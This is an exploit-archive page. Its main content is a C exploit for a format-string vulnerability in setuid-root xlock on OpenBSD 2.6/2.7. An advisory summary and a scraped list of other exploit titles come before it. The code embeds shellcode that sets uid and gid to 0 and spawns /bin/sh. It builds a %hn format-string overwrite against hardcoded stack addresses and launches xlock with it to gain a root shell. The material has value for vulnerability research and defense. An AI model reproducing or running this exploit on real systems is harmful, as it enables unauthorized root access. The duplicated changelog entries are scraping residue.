
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
109 lines
No EOL
3.6 KiB
C
109 lines
No EOL
3.6 KiB
C
// source: https://www.securityfocus.com/bid/1585/info
|
|
|
|
A vulnerability exists in versions of the xlockmore program, originally written by David Bagley. It is believed to affect all versions of xlock derived from xlockmore. This includes the xlock shipped with a number of popular operating systems.
|
|
|
|
Xlock is installed setuid root. Normally, the -d option to xlock is used to set the display it will be locking. This value is normally of the format hostname:portoffset, ie. x.host.com:0, to connect to the X server runnign on x.host.com, listening on port 6000. By supplying format strings in this value, it is possible to cause xlock to output numeric values. Using other format strings, it may be possible for an attacker to overwrite values on the stack. This may make it possible to execute arbitrary code with root privileges.
|
|
|
|
While several vulnerable operating systems have been listed, this list is by no means complete.
|
|
|
|
It has been reported that this vulnerability exists only in systems with versions of xlock that use the error() call. (it is also unverified whether the bug is in libc or xlib).
|
|
|
|
|
|
/*
|
|
OpenBSD 2.6/2.7 xlock exploit by noir
|
|
noir@gsu.linux.org.tr
|
|
|
|
tested only on OpenBSD/i386 2.6
|
|
|
|
thanks:
|
|
cengiz_turkmen@hotmail.com for support!
|
|
|
|
greets: caddis <caddis@dissension.net> orginal chpass exploit
|
|
bind, CronoS, dustdvl, ppl from defcon7, gsu-linux staff
|
|
TESO, ADM, Lam3rz, SSG
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
|
|
|
|
|
|
char bsd_shellcode[] =
|
|
"\x31\xc0\x50\x50\xb0\x17\xcd\x80"// setuid(0)
|
|
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80"//setgid(0)
|
|
"\xeb\x16\x5e\x31\xc0\x8d\x0e\x89"
|
|
"\x4e\x08\x89\x46\x0c\x8d\x4e\x08"
|
|
"\x50\x51\x56\x50\xb0\x3b\xcd\x80"
|
|
"\xe8\xe5\xff\xff\xff/bin/sh";
|
|
|
|
struct platform {
|
|
char *name;
|
|
unsigned short count;
|
|
unsigned long dest_addr;
|
|
unsigned long shell_addr;
|
|
char *shellcode;
|
|
};
|
|
|
|
struct platform targets[3] =
|
|
{
|
|
{ "OpenBSD 2.6 i386 ", 246, 0xdfbfd4a0, 0xdfbfdde0, bsd_shellcode },
|
|
{ "OpenBSD 2.7 i386 ", 246, 0xaabbccdd, 0xaabbccdd, bsd_shellcode },
|
|
{ NULL, 0, 0, 0, NULL }
|
|
};
|
|
|
|
char jmpcode[129];
|
|
char fmt_string[2000];
|
|
|
|
char *args[] = { "xlock", "-display", fmt_string, NULL };
|
|
char *envs[] = { jmpcode, NULL };
|
|
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
char *p;
|
|
int x, len = 0;
|
|
struct platform *target;
|
|
unsigned short low, high;
|
|
unsigned long shell_addr[2], dest_addr[2];
|
|
|
|
|
|
target = &targets[0];
|
|
|
|
memset(jmpcode, 0x90, sizeof(jmpcode));
|
|
strcpy(jmpcode + sizeof(jmpcode) - strlen(target->shellcode), target->shellcode);
|
|
|
|
shell_addr[0] = (target->shell_addr & 0xffff0000) >> 16;
|
|
shell_addr[1] = target->shell_addr & 0xffff;
|
|
|
|
memset(fmt_string, 0x00, sizeof(fmt_string));
|
|
|
|
for (x = 17; x < target->count; x++) {
|
|
strcat(fmt_string, "%8x");
|
|
len += 8;
|
|
}
|
|
|
|
if (shell_addr[1] > shell_addr[0]) {
|
|
dest_addr[0] = target->dest_addr+2;
|
|
dest_addr[1] = target->dest_addr;
|
|
low = shell_addr[0] - len;
|
|
high = shell_addr[1] - low - len;
|
|
} else {
|
|
dest_addr[0] = target->dest_addr;
|
|
dest_addr[1] = target->dest_addr+2;
|
|
low = shell_addr[1] - len;
|
|
high = shell_addr[0] - low - len;
|
|
}
|
|
|
|
*(long *)&fmt_string[0] = 0x41;
|
|
*(long *)&fmt_string[1] = 0x11111111;
|
|
*(long *)&fmt_string[5] = dest_addr[0];
|
|
*(long *)&fmt_string[9] = 0x11111111;
|
|
*(long *)&fmt_string[13] = dest_addr[1];
|
|
|
|
|
|
p = fmt_string + strlen(fmt_string);
|
|
sprintf(p, "%%%dd%%hn%%%dd%%hn", low, high);
|
|
|
|
execve("/usr/X11R6/bin/xlock", args, envs);
|
|
perror("execve");
|
|
} |